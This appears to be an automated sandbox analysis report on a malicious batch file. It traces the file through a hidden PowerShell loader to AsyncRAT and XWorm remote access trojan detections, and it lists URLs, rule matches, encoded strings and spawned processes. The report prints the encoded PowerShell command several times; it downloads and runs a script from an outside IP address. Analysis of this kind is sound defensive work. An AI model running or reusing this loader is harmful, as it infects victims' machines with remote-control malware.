            Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: powershell.exe, 00000003.00000002.1345688716.000002891AC63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000003.00000002.1345688716.00000289193E1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3715200506.0000000003451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000003.00000002.1345688716.000002891AA97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000003.00000002.1345688716.000002891AC63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000003.00000002.1345688716.00000289193E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000003.00000002.1345688716.000002891AC63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000003.00000002.1345688716.000002891A2D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000003.00000002.1345688716.000002891AA97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000003.00000002.1345688716.000002891AA97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709

            E-Banking Fraud

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==Jump to behavior

            System Summary

            barindex
            Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 3.2.powershell.exe.28919871ea0.3.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 3.2.powershell.exe.28919871ea0.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 3.2.powershell.exe.289198619b0.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 3.2.powershell.exe.289198619b0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 3.2.powershell.exe.289198a1f40.5.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 3.2.powershell.exe.289198a1f40.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, -Module-.csLong String: Length: 12184
            Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, -Module-.csLong String: Length: 12184
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3DB10DCD3_2_00007FFC3DB10DCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_015881D811_2_015881D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0158551011_2_01585510
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0158BBD811_2_0158BBD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_01585DE011_2_01585DE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0158AE9811_2_0158AE98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_015851C811_2_015851C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_01580BA011_2_01580BA0
            Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.powershell.exe.28919871ea0.3.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.2.powershell.exe.28919871ea0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.powershell.exe.289198619b0.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.2.powershell.exe.289198619b0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.powershell.exe.289198a1f40.5.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.2.powershell.exe.289198a1f40.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, wmTozIgamPcaxfvFFmctQBuKKuDsAwVSEMuGqRGRpTdsOeOJUJNObIlUSjDfeNzQTjwKKOpOFkeXybVFGUyQIhRWBAOgnBNCtmyF.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, wmTozIgamPcaxfvFFmctQBuKKuDsAwVSEMuGqRGRpTdsOeOJUJNObIlUSjDfeNzQTjwKKOpOFkeXybVFGUyQIhRWBAOgnBNCtmyF.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, -Module-.csBase64 encoded string: 'YzBkZTdhMDAxY2FjNGQ2ME8K9zFahg8EkLgPw/3iiEIfjk+MhrmgQb9JD13m4iWR', 'YzBkZTdhMDAxY2FjNGQ2MM8Jw48O6rUzH7bp5HGtr7d0Yxjh2mcqvB6FdiSQvzqzPbJMNARdMeJUt5IeeR8HlR69cbPsWyagIZYBAmQGGA8=', 'YzBkZTdhMDAxY2FjNGQ2MJF4xZPY/H4Z/WJeW60Y4icxiVuevUqnd0OmwkfYK3fJMRpHVXwU1MzxZC2JWTKDOU73jSVh/D2Dkm1HI5T7/k3xOGdlRLf8pe52qsNC6VR4O17QayNMNArNrGuSKp9oAml74hT5RRZKEl0UBXBXTT/iK4GKlsJ+FlI2av75iJPTbqSAxlmWJKMAjcGaYMqE1ycXBoGetlDKf3te4sDLYGBeVPsz8HaGLl98FE07sBS8BMZ+N/IqEwGbZJsbid7gwwG4ZIQ9IXk0ZlcXFRBa4DS9AcANCI3YZ/dGwQ8RU2gbe6E5jyIrcRsRh3xqTsBmXiZ4CpQZE8dSTheENfegW+POcOVnDRMrzEHut+0s1+Fi8CmKS6MJZR3Teoc5Q+/jhiyue1QAP2j7NAqUMUXuMenxAmuTUD61ha+ba+QLpJ0enW0CUtJHmHI+jq6uchKRoztCHPzs3D9KNNrvCTHo6KNDzbwU2kdFRrfHSh3125Hms6uscOhl+qjwnJsuRRGs89GUqrMuEvBT9EN011WtGj5vEbBCzqhSocjsGYzaUMLc2ogRsm3YXdycMMot7OAhG5Mi7zaqTwoBxTTsmYNiG1VnFeKhCOL1PuVQtVmREhSWlN+kcI1KMkIGDm/HVo51OuMbpe5YRRc6cmUsZCUB57nr7NVzYo1jufXjO1ODV4LgrRI1miQKciJaEX/giios5nZzivfZiM1i+B133VTiXJCFyDWdYdZbbSjeGaaDc5uY238xsKMw6LjWOZnCunXPsQ33AU80U4aCi4h4xcgXJgwhtAw6oKRs62LyJWwUonty3F6iHjJyC5NCrBji7L6pbFkR5FGrFeqYiZ7x867Xmg9+DTtK8AMQe0bCL04gAyt+yfXCA2/PPWTD6K2GYEXaab2mp8qercAt0p1IzKAdDnVDbR56iI5kbkeOHOUG9tIg+XNm/gbkYRwNQ/jDHAfvbkBPm7mOd0H6TESDTteDYLgu0Og7PrwYu2vABVoMGMZdyERDey80RVxVS7fnfBmCqxIVwqv+CHFyFfqCTtYTTk2/Kb6aReCtwoOMdNcPIepVp1pcCqzvlTOTMafE3e8N1nRx6209Hq6pc43JB8wnf7/abWwUEuB89P6OmR5ViBf4E1VSONBOYKrX8zFVW2wH/A8cb8/cO7HTR8NEjo+CVe6US8nBlwCh+jhKfmZsA8XsEGhBbqgS2SuFu0W+lF1dUjj8uJIwHKJ5oBPxYhzw/Hy+lFhR7UmSosXD3o0sI20H4DFG4waf4NalHXeFHHmbJxdWrEO/tSETWd4mJITIoVUqYAotPIRy+nC1qpmzuRoPL/MrJkOQd0b/YRb/vdm67QrPLUpcbltemLxnqlWPmqkMyWzZgR3pkP0ECsZ4l0Bilo5zSVEt/qD/RVMXY3iBGwGNV5prTOtq/WyBjRHMbUagCP5E5nXpnGi+67/O1VpoIaQ81ZQ8WpHKGGMP2yR5Jwh3S1YiCtP3/ndkjifUuYC7rnyuai1RpSgmLEfdu/cGyaMnbNxcq54yj6cTOdQ/ct1u7j3rNcz+34FwP83c8CcC5Rifh3L+Nnnwq+nTgCaXfUc34X6nYibPF8Z8fB/BYgkgT1bxcczHygizyN3I+0L6sR3BdOXlOR1Vnbe5q0IeXpgIJO+8AzFinYzP9mjO8R98MW0HVFTMch98ZWlAILtD/uF2lZQ8DWtFfojJ5lzJoGddaWF36GfLgfqztpBWNLJgCUXcyeNOE6KtV7X44WOi+3G3nPJ7w/1nAWlxS17Qrg46lsaHXLx3cFVflWyYfv+sU+AJiXj5xAeYjjUhIM/HbNIWGFiBoCuUld0hCVUALcffN7Sx6HPFl+t/plp3a5Bk8cpp7m2sVkYMUdEpR3mWVo+0Q2+1RYCS0XtWh9khSFK98vkdJD63iiRdKW33anbyDY1BhuL9XM4QrtmT4tCv9BAfOidzGEWKfRbEc6Mx8OIvq6eX3tPfudXdNay5QOqVi2mCORSVW4VRmmZLCrS6Haxe0hiVC0wJxdleYLVOS+MXQ/KsqVGFpg4+YacVS2Dy679SMbAy9qJ77eQK1eMcvwcBEeNmpHPmY4BoZQBFpxutsztWin3Mx+MtY+4OQ5Wo2qcHXmJy6zGQsKt5uexXg6a96nJdt9m2HvNSo5kZIr12IQt2BvMQrboyRjh7RA0fG/UEtZ0Z4yjMg5zw2O5HO6ZVm79VCo+zwuP/QOTFSLZCRyQgSBhYnSq8aeGCd9Y634XAIpkiKvIUOd3NL10YqTZGVQDTZMC9KCLzjwznH/p3FoynihjuO+4WdRyjTfi5S4JIOSqBpmH03j6jWF4wvjVE+PX/w54oPCZCqRq/gVBWG+DHc4C7wr8rFUMFrnP2xbp0DnTNZiwDM7HMGmO8QAyHQARKPX+MphxqRrX9BWBLdqv91HKbTfHzD4Hl+uiPGKbKn0yhPczga82O0VQQUHUiB2+GWjPduA2LMay4nbViIBroPUBHBvb6wCbcsLkAoytSZnICtq3PmODNzFfmeB3CXmwlDzNlphVm76s55QOzz37IrpA/SNiUArFQBgreJqOqGq88SZkSPJWOa2+3CZ0pkX6WKfxhbZutPiS9ERKmEWoNs7aJ4ciL+vQ0MkkOwNmvHh5w7Io0qFouSeMWfA1PYiRX/T8/9hNDQJWpOr0k9VOsOfNoHd6Z+WkW65Ge3HKFz3GerC37Pm9hK1fQZct9SCxnbMXj4xJ9ZylIScHhdllsgXpXYyWCJgJncWLwpDrvnVXkR0bvqRsLHorCMq/l9iDdbr48D6BffGSBxeK
            Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, -Module-.csBase64 encoded string: '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
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.bank.troj.expl.evad.winBAT@10/9@1/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\58KI5NFirr4xN5IU
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svakhwtv.vaj.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" "
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: 92.255.85.2.batVirustotal: Detection: 17%
            Source: 92.255.85.2.batReversingLabs: Detection: 16%
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA33.tmp" "c:\Users\user\AppData\Local\Temp\strztqek\CSC690A104BD3BA4E08BCA82F5F59FD8A8.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
